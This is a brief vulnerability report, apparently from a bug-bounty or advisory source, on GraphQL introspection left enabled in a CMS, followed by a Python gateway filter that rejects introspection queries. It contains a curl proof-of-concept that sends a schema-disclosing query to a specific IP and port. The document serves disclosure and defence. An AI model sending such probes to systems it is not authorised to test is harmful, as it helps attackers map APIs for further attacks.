summary
The GraphQL endpoint of this CMS has introspection queries enabled. Any attacker can send an introspection query to it and disclose the capabilities of the target GraphQL API, such as its types and their fields.
POC
curl -X POST \
  -H "User-Agent: oxpecker" \
  -H "Accept-Encoding: gzip, deflate" \
  -H "Accept: */*" \
  -H "Connection: keep-alive" \
  -H "Content-Length: 94" \
  -H "Content-Type: application/json" \
  -d '{"query": "query cop { __schema { types { name fields { name } } } }", "operationName": "cop"}' \
  'http://34.127.101.91:40410/graphql'
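
A gateway-side check for the request shown in the POC, as an added example that is not part of the original report or of the CMS's code: it flags POST bodies whose GraphQL document selects `__schema` or `__type`, while ignoring those names inside string arguments and comments. The function names and the choice to keep `__typename` allowed are assumptions, and it covers JSON POST bodies only (single or batched).

```python
import json
import re

# GraphQL lexical pieces to skip, so that "__schema" inside a string
# argument or a comment is not mistaken for a field selection.
_TOKEN = re.compile(
    r'"""(?:\\"""|[\s\S])*?"""'   # block string
    r'|"(?:\\.|[^"\\\n])*"'       # ordinary string
    r'|#[^\n]*'                   # comment
    r'|[_A-Za-z][_0-9A-Za-z]*'    # name (field, alias, keyword, ...)
)
# Assumption: __typename stays allowed, since ordinary clients rely on it.
INTROSPECTION_FIELDS = {"__schema", "__type"}


def introspection_fields(query: str) -> set:
    """Return the introspection root fields named in a GraphQL document."""
    found = set()
    for match in _TOKEN.finditer(query):
        token = match.group(0)
        # Strings and comments start with '"' or '#'; only names are checked.
        if token[0] not in '"#' and token in INTROSPECTION_FIELDS:
            found.add(token)
    return found


def should_reject(body: bytes) -> bool:
    """Decide whether a JSON POST body to /graphql asks for introspection."""
    try:
        payload = json.loads(body)
    except ValueError:
        return False  # not JSON; let the GraphQL server report the error
    # Batched requests arrive as a JSON array of operations.
    operations = payload if isinstance(payload, list) else [payload]
    return any(
        isinstance(op, dict)
        and isinstance(op.get("query"), str)
        and bool(introspection_fields(op["query"]))
        for op in operations
    )
```

A filter like this is a compensating control in front of the endpoint; turning introspection off in the GraphQL server itself removes the exposure at the source.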